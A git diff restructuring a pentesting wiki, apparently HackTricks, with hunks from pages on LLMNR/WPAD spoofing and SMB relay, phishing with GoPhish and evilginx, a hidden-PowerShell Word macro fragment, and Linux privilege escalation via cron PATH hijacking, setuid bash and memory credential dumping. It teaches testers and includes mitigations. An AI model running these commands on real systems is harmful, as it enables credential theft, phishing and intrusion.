-* [**Padding Oracle**](cryptography/padding-oracle-priv.md)
+* [**ECB**](../cryptography/electronic-code-book-ecb.md)
+* [**CBC-MAC**](../cryptography/cipher-block-chaining-cbc-mac-priv.md)
+* [**Padding Oracle**](../cryptography/padding-oracle-priv.md)
diff --git a/pentesting/pentesting-network/README.md b/generic-methodologies-and-resources/pentesting-network/README.md
similarity index 100%
rename from pentesting/pentesting-network/README.md
rename to generic-methodologies-and-resources/pentesting-network/README.md
diff --git a/pentesting/pentesting-network/dhcpv6.md b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md
similarity index 100%
rename from pentesting/pentesting-network/dhcpv6.md
rename to generic-methodologies-and-resources/pentesting-network/dhcpv6.md
diff --git a/pentesting/pentesting-network/ids-evasion.md b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md
similarity index 100%
rename from pentesting/pentesting-network/ids-evasion.md
rename to generic-methodologies-and-resources/pentesting-network/ids-evasion.md
diff --git a/pentesting/pentesting-network/network-protocols-explained-esp.md b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md
similarity index 100%
rename from pentesting/pentesting-network/network-protocols-explained-esp.md
rename to generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md
diff --git a/pentesting/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
similarity index 100%
rename from pentesting/pentesting-network/nmap-summary-esp.md
rename to generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
diff --git a/pentesting/pentesting-network/pentesting-ipv6.md b/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md
similarity index 100%
rename from pentesting/pentesting-network/pentesting-ipv6.md
rename to generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md
diff --git a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
similarity index 95%
rename from pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
rename to generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
index 3c4964a9..8654ff5d 100644
--- a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
+++ b/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
@@ -1,5 +1,7 @@
# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
+## Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
+
+## Network protocols
-# Network protocols
-
-## LLMNR, NBT-NS, and mDNS
+### LLMNR, NBT-NS, and mDNS
Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network. These protocols are unauthenticated and broadcast messages over UDP; thus, attackers can exploit them to direct users to malicious services.
You can impersonate services that are searched by hosts using Responder to send fake responses.\
Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
-## WPAD
+### WPAD
Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from the network. A WPAD server provides client proxy settings via a particular URL (e.g., _http://wpad.example.org/wpad.dat_) upon being identified through any of the following:
@@ -36,7 +37,7 @@ Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from th
Responder automates the WPAD attack—running a proxy and directing clients to a malicious WPAD server via DHCP, DNS, LLMNR, and NBT-NS.
-# Responder
+## Responder
> Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to _specific_ NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: [http://support.microsoft.com/kb/163409](http://support.microsoft.com/kb/163409)). By default, the tool will only answer to File Server Service request, which is for SMB.
>
@@ -97,7 +98,7 @@ To run default Responder behaviour you only have to execute:
responder -I -Pv
```
-An interesting technique is to use responder to downgrade the NTLM authentication when possible. This will allow to **capture NTLMv1 challenges and responses** instead of NTLMv2 that can be **easily cracked** [**following this guide**](../../windows/ntlm/#ntlmv1-attack)**.**
+An interesting technique is to use responder to downgrade the NTLM authentication when possible. This will allow to **capture NTLMv1 challenges and responses** instead of NTLMv2 that can be **easily cracked** [**following this guide**](../../windows-hardening/ntlm/#ntlmv1-attack)**.**
```bash
#Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"
@@ -120,7 +121,7 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s
The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`
-# DHCP Poisoning
+## DHCP Poisoning
Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.
@@ -134,7 +135,7 @@ However, spoofing DHCP answers has unique benefits. **It's definitely stealthier
./Responder.py -I eth0 -rPdv
```
-# Capturing credentials
+## Capturing credentials
Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):
@@ -142,7 +143,7 @@ It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
 (1) (1).jpg>)
-# Inveigh
+## Inveigh
> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
@@ -150,7 +151,7 @@ It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
-# Relay Attack
+## Relay Attack
**Most of the information for this section was taken from** [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)
@@ -180,29 +181,29 @@ python MultiRelay.py -t -u ALL #If "ALL" then all users are relayed
.png>)
-## Post-Exploitation (MultiRelay)
+### Post-Exploitation (MultiRelay)
**At this point you can shut off Responder; we don’t need it anymore.**\
**With the shell access we have obtained, there are many actions that we can perform directly from here:**
**Mimikatz** commands can also be performed directly **from the shell**. Unfortunately, the target used for this tutorial’s antivirus ate my mimikatz, but the following commands can be executed to run mimikatz, as well as the entire pallette of modules.: **`Mimi sekurlsa::logonpasswords`**
-# InveighZero
+## InveighZero
InveighZero is a C# LLMNR/NBNS/mDNS/DNS/DHCPv6 spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. This version shares many features with the PowerShell version of Inveigh.\
More information in the [github of the project](https://github.com/Kevin-Robertson/InveighZero).
-# Force Privileged Accounts to login via NTLM
+## Force Privileged Accounts to login via NTLM
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
-{% content-ref url="../../windows/active-directory-methodology/printers-spooler-service-abuse.md" %}
-[printers-spooler-service-abuse.md](../../windows/active-directory-methodology/printers-spooler-service-abuse.md)
+{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
+[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
{% endcontent-ref %}
-# Solution
+## Solution
-## Disabling LLMNR
+### Disabling LLMNR
To disable LLMNR in your domain for DNS clients, open gpedit.msc.\
Navigate to Computer Configuration->Administrative Templates->Network->DNS client.\
@@ -214,7 +215,7 @@ Once the new window opens, enable this option, press Apply and click OK:
-## **Disabling NBT-NS**
+### **Disabling NBT-NS**
One option for disabling NBT-NS is to use DHCP scope options.
@@ -230,11 +231,11 @@ Select the option “001 Microsoft Disable Netbios Option” from the list and c
-## WPAD
+### WPAD
To mitigate against the WPAD attack, you can add an entry for "wpad" in your DNS zone. Note that the DNS entry does not need to point to a valid WPAD server. As long as the queries are resolved, the attack will be prevented.
-## Multi-relay
+### Multi-relay
1\. **Forcing SMB Signing on all local windows machines**. This setting will digitally sign each and every SMB session which forces both the client and server to verify the source of the packets before continuing. This setting is only enabled by default on Domain Controllers. The following articles from Microsoft detail these settings (which can be enabled through group policy), and how to implement them.
@@ -248,7 +249,7 @@ To mitigate against the WPAD attack, you can add an entry for "wpad" in your DNS
4\. **Prevent unauthorised users on your network**. An insider threat will likely not be utilising an SMB Relay attack, as they already have network credentials. By beefing up your physical security policies, preventing rogue devices on the network with ACLs and MAC Filtering, and ensuring proper network segmentation, you can greatly limit the threat of this attack being performed.
-# References
+## References
**Images from:**\
[https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
diff --git a/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md b/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md
similarity index 100%
rename from pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md
rename to generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md
diff --git a/pentesting/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md
similarity index 100%
rename from pentesting/pentesting-wifi/README.md
rename to generic-methodologies-and-resources/pentesting-wifi/README.md
diff --git a/pentesting/pentesting-wifi/evil-twin-eap-tls.md b/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md
similarity index 100%
rename from pentesting/pentesting-wifi/evil-twin-eap-tls.md
rename to generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md
diff --git a/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md
similarity index 92%
rename from phishing-methodology/README.md
rename to generic-methodologies-and-resources/phishing-methodology/README.md
index dfee9dee..6943c207 100644
--- a/phishing-methodology/README.md
+++ b/generic-methodologies-and-resources/phishing-methodology/README.md
@@ -1,5 +1,7 @@
# Phishing Methodology
+## Phishing Methodology
+
-
-# Methodology
+## Methodology
1. Recon the victim
1. Select the **victim domain**.
@@ -32,9 +33,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2. Prepare the **web page** to steal the credentials
4. Launch the campaign!
-# Generate similar domain names or buy a trusted domain
+## Generate similar domain names or buy a trusted domain
-## Domain Name Variation Techniques
+### Domain Name Variation Techniques
* **Keyword**: The domain name **contains** an important **keyword** of the original domain (e.g., zelster.com-management.com).
* **hypened subdomain**: Change the **dot for a hyphen** of a subdomain (e.g., www-zelster.com).
@@ -60,7 +61,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [https://dnstwister.report/](https://dnstwister.report)
* [https://www.internetmarketingninjas.com/tools/free-tools/domain-typo-generator/](https://www.internetmarketingninjas.com/tools/free-tools/domain-typo-generator/)
-## Bitflipping
+### Bitflipping
In the world of computing, everything is stored in bits (zeros and ones) in memory behind the scenes.\
This applies to domains too. For example, _windows.com_ becomes _01110111..._ in the volatile memory of your computing device.\
@@ -72,7 +73,7 @@ For example a 1 bit modification in the domain microsoft.com can transform it in
For more information read [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
-## Buy a trusted domain
+### Buy a trusted domain
You can search in [https://www.expireddomains.net/](https://www.expireddomains.net) for a expired domain that you could use.\
In order to make sure that the expired domain that you are going to buy **has already a good SEO** you could search how is it categorized in:
@@ -80,7 +81,7 @@ In order to make sure that the expired domain that you are going to buy **has al
* [http://www.fortiguard.com/webfilter](http://www.fortiguard.com/webfilter)
* [https://urlfiltering.paloaltonetworks.com/query/](https://urlfiltering.paloaltonetworks.com/query/)
-# Discovering Emails
+## Discovering Emails
* [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester) (100% free)
* [https://phonebook.cz/](https://phonebook.cz) (100% free)
@@ -88,12 +89,12 @@ In order to make sure that the expired domain that you are going to buy **has al
* [https://hunter.io/](https://hunter.io)
* [https://anymailfinder.com/](https://anymailfinder.com)
-In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](broken-reference/).\
+In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../phishing-methodology/broken-reference/).\
Moreover, don't forget that if the users use **any web portal to access their mails**, you can check if it's vulnerable to **username brute force**, and exploit the vulnerability if possible.
-# Configuring GoPhish
+## Configuring GoPhish
-## Installation
+### Installation
You can download it from [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
@@ -104,7 +105,7 @@ You will be given a password for the admin user in port 3333 in the output. Ther
ssh -L 3333:127.0.0.1:3333 @
```
-## Configuration
+### Configuration
**TLS certificate configuration**
@@ -246,24 +247,24 @@ ss -l | grep "3333\|443"
service gophish stop
```
-# Configuring mail server and domain
+## Configuring mail server and domain
-## Wait
+### Wait
The older a domain is the less probable it's going to be caught as spam. Then you should wait as much time as possible (at least 1week) before the phishing assessment.\
Note that even if you have to wait a week you can finish configuring everything now.
-## Configure Reverse DNS (rDNS) record
+### Configure Reverse DNS (rDNS) record
Set a rDNS (PTR) record that resolves the IP address of the VPS to the domain name.
-## Sender Policy Framework (SPF) Record
+### Sender Policy Framework (SPF) Record
-You must **configure a SPF record for the new domain**. If you don't know what is a SPF record [**read this page**](../pentesting/pentesting-smtp/#spf).
+You must **configure a SPF record for the new domain**. If you don't know what is a SPF record [**read this page**](../../network-services-pentesting/pentesting-smtp/#spf).
You can use [https://www.spfwizard.net/](https://www.spfwizard.net) to generate your SPF policy (use the IP of the VPS machine)
-.png>)
+.png>)
This is the content that must be set inside a TXT record inside the domain:
@@ -271,9 +272,9 @@ This is the content that must be set inside a TXT record inside the domain:
v=spf1 mx a ip4:ip.ip.ip.ip ?all
```
-## Domain-based Message Authentication, Reporting & Conformance (DMARC) Record
+### Domain-based Message Authentication, Reporting & Conformance (DMARC) Record
-You must **configure a DMARC record for the new domain**. If you don't know what is a DMARC record [**read this page**](../pentesting/pentesting-smtp/#dmarc).
+You must **configure a DMARC record for the new domain**. If you don't know what is a DMARC record [**read this page**](../../network-services-pentesting/pentesting-smtp/#dmarc).
You have to create a new DNS TXT record pointing the hostname `_dmarc.` with the following content:
@@ -281,9 +282,9 @@ You have to create a new DNS TXT record pointing the hostname `_dmarc.`
v=DMARC1; p=none
```
-## DomainKeys Identified Mail (DKIM)
+### DomainKeys Identified Mail (DKIM)
-You must **configure a DKIM for the new domain**. If you don't know what is a DMARC record [**read this page**](../pentesting/pentesting-smtp/#dkim).
+You must **configure a DKIM for the new domain**. If you don't know what is a DMARC record [**read this page**](../../network-services-pentesting/pentesting-smtp/#dkim).
This tutorial is based on: [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
@@ -295,7 +296,7 @@ v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wPibdqP
```
{% endhint %}
-## Test your email configuration score
+### Test your email configuration score
You can do that using [https://www.mail-tester.com/](https://www.mail-tester.com)\
Just access the page and send an email to the address they give you:
@@ -326,30 +327,30 @@ Authentication-Results: mx.google.com;
dkim=pass header.i=@example.com;
```
-## Removing from Spamhouse Blacklist
+### Removing from Spamhouse Blacklist
The page www.mail-tester.com can indicate you if you your domain is being blocked by spamhouse. You can request your domain/IP to be removed at: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
-## Removing from Microsoft Blacklist
+### Removing from Microsoft Blacklist
You can request your domain/IP to be removed at [https://sender.office.com/](https://sender.office.com).
-# Create & Launch GoPhish Campaign
+## Create & Launch GoPhish Campaign
-## Sending Profile
+### Sending Profile
* Set some **name to identify** the sender profile
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
- (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (11).png>)
+ (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (11).png>)
{% hint style="info" %}
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\
I would recommend to **send the test emails to 10min mails addresses** in order to avoid getting blacklisted making tests.
{% endhint %}
-## Email Template
+### Email Template
* Set some **name to identify** the template
* Then write a **subject** (nothing estrange, just something you could expect to read in a regular email)
@@ -383,20 +384,20 @@ Note that **in order to increase the credibility of the email**, it's recommende
* Search for **public emails** like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response.
* Try to contact **some valid discovered** email and wait for the response
- (1).png>)
+ (1).png>)
{% hint style="info" %}
-The Email Template also allows to **attach files to send**. If you would also like to steal NTLM challenges using some specially crafted files/documents [read this page](../windows/ntlm/places-to-steal-ntlm-creds.md).
+The Email Template also allows to **attach files to send**. If you would also like to steal NTLM challenges using some specially crafted files/documents [read this page](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md).
{% endhint %}
-## Landing Page
+### Landing Page
* Write a **name**
* **Write the HTML code** of the web page. Note that you can **import** web pages.
* Mark **Capture Submitted Data** and **Capture Passwords**
* Set a **redirection**
-.png>)
+.png>)
{% hint style="info" %}
Usually you will need to modify the HTML code of the page and make some tests in local (maybe using some Apache server) **until you like the results.** Then, write that HTML code in the box.\
@@ -407,20 +408,20 @@ Note that if you need to **use some static resources** for the HTML (maybe some
For the redirection you could **redirect the users to the legit main web page** of the victim, or redirect them to _/static/migration.html_ for example, put some **spinning wheel (**[**https://loading.io/**](https://loading.io)**) for 5 seconds and then indicate that the process was successful**.
{% endhint %}
-## Users & Groups
+### Users & Groups
* Set a name
* **Import the data** (note that in order to use the template for the example you need the firstname, last name and email address of each user)
-.png>)
+.png>)
-## Campaign
+### Campaign
Finally, create a campaign selecting a name, the email template, the landing page, the URL, the sending profile and the group. Note that the URL will be the link sent to the victims
Note that the **Sending Profile allow to send a test email to see how will the final phishing email looks like**:
-.png>)
+.png>)
{% hint style="info" %}
I would recommend to **send the test emails to 10min mails addresses** in order to avoid getting blacklisted making tests.
@@ -428,7 +429,7 @@ I would recommend to **send the test emails to 10min mails addresses** in order
Once everything is ready, just launch the campaign!
-# Website Cloning
+## Website Cloning
If for any reason you want to clone the website check the following page:
@@ -436,7 +437,7 @@ If for any reason you want to clone the website check the following page:
[clone-a-website.md](clone-a-website.md)
{% endcontent-ref %}
-# Phishing2.0
+## Phishing2.0
The previous attack is pretty clever as you are faking a real website and gathering the information set by the user. Unfortunately, if the user didn't put the correct password or if the application you faked is configured with 2FA, **this information won't allow you to impersonate the tricked user**.
@@ -447,7 +448,7 @@ This is where tools like [**evilginx2**](https://github.com/kgretzky/evilginx2)
3. If the account is configured with **2FA**, the MitM page will ask for it and once the **user introduces** it the tool will send it to the real web page.
4. Once the user is authenticated you (as attacker) will have **captured the credentials, the 2FA, the cookie and any information** of every interaction your while the tool is performing a MitM.
-# Detecting the detection
+## Detecting the detection
Obviously one of the best ways to know if you have been busted is to **search your domain inside blacklists**. If it appears listed, somehow your domain was detected as suspicions.\
One easy way to check if you domain appears in any blacklist is to use [https://malwareworld.com/](https://malwareworld.com)
@@ -460,11 +461,11 @@ However, there are other ways to know if the victim is **actively looking for su
You can **buy a domain with a very similar name** to the victims domain **and/or generate a certificate** for a **subdomain** of a domain controlled by you **containing** the **keyword** of the victim's domain. If the **victim** perform any kind of **DNS or HTTP interaction** with them, you will know that **he is actively looking** for suspicious domains and you will need to be very stealth.
-## Evaluate the phishing
+### Evaluate the phishing
Use [**Phishious** ](https://github.com/Rices/Phishious)to evaluate if your email is going to end in the spam folder or if it's going to be blocked or successful.
-# References
+## References
* [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
* [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/)
diff --git a/phishing-methodology/clone-a-website.md b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
similarity index 100%
rename from phishing-methodology/clone-a-website.md
rename to generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
diff --git a/phishing-methodology/detecting-phising.md b/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
similarity index 95%
rename from phishing-methodology/detecting-phising.md
rename to generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
index 65da0e71..56620395 100644
--- a/phishing-methodology/detecting-phising.md
+++ b/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
@@ -1,4 +1,4 @@
-
+# Detecting Phising
-
-
diff --git a/phishing-methodology/phishing-documents.md b/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
similarity index 96%
rename from phishing-methodology/phishing-documents.md
rename to generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
index b0d37dcc..731a7631 100644
--- a/phishing-methodology/phishing-documents.md
+++ b/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
@@ -1,4 +1,4 @@
-
+# Phishing Documents
/whatever
-.png>)
+.png>)
-## Macros Code
+### Macros Code
```
Sub AutoOpen()
@@ -54,21 +53,20 @@ With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteBlackLines 1
```
-# Autoload functions
+## Autoload functions
The more common they are, the more probable the AV will detect it.
* AutoOpen()
* Document\_Open()
-# Malicious Macros Generators
+## Malicious Macros Generators
-## MacOS
+### MacOS
* [**macphish**](https://github.com/cldrn/macphish)
* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
-
-
-
diff --git a/search-exploits.md b/generic-methodologies-and-resources/search-exploits.md
similarity index 100%
rename from search-exploits.md
rename to generic-methodologies-and-resources/search-exploits.md
diff --git a/shells/shells/README.md b/generic-methodologies-and-resources/shells/README.md
similarity index 100%
rename from shells/shells/README.md
rename to generic-methodologies-and-resources/shells/README.md
diff --git a/shells/shells/full-ttys.md b/generic-methodologies-and-resources/shells/full-ttys.md
similarity index 100%
rename from shells/shells/full-ttys.md
rename to generic-methodologies-and-resources/shells/full-ttys.md
diff --git a/shells/shells/linux.md b/generic-methodologies-and-resources/shells/linux.md
similarity index 100%
rename from shells/shells/linux.md
rename to generic-methodologies-and-resources/shells/linux.md
diff --git a/shells/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md
similarity index 100%
rename from shells/shells/msfvenom.md
rename to generic-methodologies-and-resources/shells/msfvenom.md
diff --git a/shells/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md
similarity index 100%
rename from shells/shells/windows.md
rename to generic-methodologies-and-resources/shells/windows.md
diff --git a/tunneling-and-port-forwarding.md b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md
similarity index 100%
rename from tunneling-and-port-forwarding.md
rename to generic-methodologies-and-resources/tunneling-and-port-forwarding.md
diff --git a/linux-unix/linux-environment-variables.md b/linux-hardening/linux-environment-variables.md
similarity index 100%
rename from linux-unix/linux-environment-variables.md
rename to linux-hardening/linux-environment-variables.md
diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md
similarity index 77%
rename from linux-unix/linux-privilege-escalation-checklist.md
rename to linux-hardening/linux-privilege-escalation-checklist.md
index 382912f3..19867fd3 100644
--- a/linux-unix/linux-privilege-escalation-checklist.md
+++ b/linux-hardening/linux-privilege-escalation-checklist.md
@@ -1,4 +1,4 @@
-
+# Checklist - Linux Privilege Escalation
-
-
diff --git a/linux-unix/privilege-escalation/README.md b/linux-hardening/privilege-escalation/README.md
similarity index 95%
rename from linux-unix/privilege-escalation/README.md
rename to linux-hardening/privilege-escalation/README.md
index 979377e9..0638dc71 100644
--- a/linux-unix/privilege-escalation/README.md
+++ b/linux-hardening/privilege-escalation/README.md
@@ -1,4 +1,4 @@
-
+# Linux Privilege Escalation
strings /tmp/mem_ftp #User and password
```
-## GDB Script
+### GDB Script
{% code title="dump-memory.sh" %}
```bash
@@ -281,7 +280,7 @@ done
```
{% endcode %}
-## /proc/$pid/maps & /proc/$pid/mem
+### /proc/$pid/maps & /proc/$pid/mem
For a given process ID, **maps shows how memory is mapped within that processes'** virtual address space; it also shows the **permissions of each mapped region**. The **mem** pseudo file **exposes the processes memory itself**. From the **maps** file we know which **memory regions are readable** and their offsets. We use this information to **seek into the mem file and dump all readable regions** to a file.
@@ -298,7 +297,7 @@ procdump()
)
```
-## /dev/mem
+### /dev/mem
`/dev/mem` provides access to the system's **physical** memory, not the virtual memory. The kernels virtual address space can be accessed using /dev/kmem.\
Typically, `/dev/mem` is only readable by **root** and **kmem** group.
@@ -307,7 +306,7 @@ Typically, `/dev/mem` is only readable by **root** and **kmem** group.
strings /dev/mem -n10 | grep -i PASS
```
-## ProcDump for linux
+### ProcDump for linux
ProcDump is a Linux reimagining of the classic ProcDump tool from the Sysinternals suite of tools for Windows. Get it in [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
@@ -338,7 +337,7 @@ Press Ctrl-C to end monitoring without terminating the process.
[20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714
```
-## Tools
+### Tools
To dump a process memory you could use:
@@ -346,9 +345,9 @@ To dump a process memory you could use:
* [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - _You can manually remove root requirements and dump process owned by you_
* Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root is required)
-# Credentials from Process Memory
+## Credentials from Process Memory
-## Manual example
+### Manual example
If you find that the authenticator process is running:
@@ -364,7 +363,7 @@ You can dump the process (see before sections to find different ways to dump the
strings *.dump | grep -i password
```
-## mimipenguin
+### mimipenguin
The tool [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) will **steal clear text credentials from memory** and from some **well known files**. It requires root privileges to work properly.
@@ -377,7 +376,7 @@ The tool [**https://github.com/huntergregal/mimipenguin**](https://github.com/hu
| Apache2 (Active HTTP Basic Auth Sessions) | apache2 |
| OpenSSH (Active SSH Sessions - Sudo Usage) | sshd: |
-# Scheduled/Cron jobs
+## Scheduled/Cron jobs
Check if any scheduled job is vulnerable. Maybe you can take advantage of a script being executed by root (wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?).
@@ -387,7 +386,7 @@ ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
```
-# Cron path
+## Cron path
For example, inside _/etc/crontab_ you can find the PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_
@@ -402,7 +401,7 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid
```
-# Cron using a script with a wildcard (Wildcard Injection)
+## Cron using a script with a wildcard (Wildcard Injection)
If a script being executed by root has a “**\***” inside a command, you could exploit this to make unexpected things (like privesc). Example:
@@ -418,7 +417,7 @@ Read the following page for more wildcard exploitation tricks:
[wildcards-spare-tricks.md](wildcards-spare-tricks.md)
{% endcontent-ref %}
-# Cron script overwriting and symlink
+## Cron script overwriting and symlink
If you **can modify a cron script** executed by root, you can get a shell very easily:
@@ -434,7 +433,7 @@ If the script executed by root uses a **directory where you have full access**,
ln -d -s
```
-# Frequent cron jobs
+## Frequent cron jobs
You can monitor the processes to search for processes that are being executed every 1,2 or 5 minutes. Maybe you can take advantage of it and escalate privileges.
@@ -446,7 +445,7 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do
**You can also use** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (this will monitor and list every process that start).
-# Invisible cron jobs
+## Invisible cron jobs
It's possible to create a cronjob **putting a carriage return after a comment** (without new line character), and the cron job will work. Example (note the carriege return char):
@@ -454,18 +453,18 @@ It's possible to create a cronjob **putting a carriage return after a comment**
#This is a comment inside a cron config file\r* * * * * echo "Surprise!"
```
-# Services
+## Services
-# Writable _.service_ files
+## Writable _.service_ files
Check if you can write any `.service` file, if you can, you **could modify it** so it **executes** your **backdoor when** the service is **started**, **restarted** or **stopped** (maybe you will need to wait until the machine is rebooted).\
For example create your backdoor inside the .service file with **`ExecStart=/tmp/script.sh`**
-# Writable service binaries
+## Writable service binaries
Keep in mid that if you have **write permissions over binaries being executed by services**, you can change them for backdoors so when the services get re-executed the backdoors will be executed.
-# systemd PATH - Relative Paths
+## systemd PATH - Relative Paths
You can see the PATH used by **systemd** with:
@@ -485,7 +484,7 @@ Then, create a **executable** with the **same name as the relative path binary**
**Learn more about services with `man systemd.service`.**
-# **Timers**
+## **Timers**
**Timers** are systemd unit files whose name ends in . **timer** that control . service files or events. **Timers** can be used as an alternative to cron. **Timers** have built-in support for calendar time events, monotonic time events, and can be run asynchronously.
@@ -495,7 +494,7 @@ You can enumerate all the timers doing:
systemctl list-timers --all
```
-# Writable timers
+## Writable timers
If you can modify a timer you can make it execute some existent systemd.unit (like a `.service` or a `.target`)
@@ -514,7 +513,7 @@ Therefore, in order to abuse this permissions you would need to:
**Learn more about timers with `man systemd.timer`.**
-# **Enabling Timer**
+## **Enabling Timer**
In order to enable a timer you need root privileges and to execute:
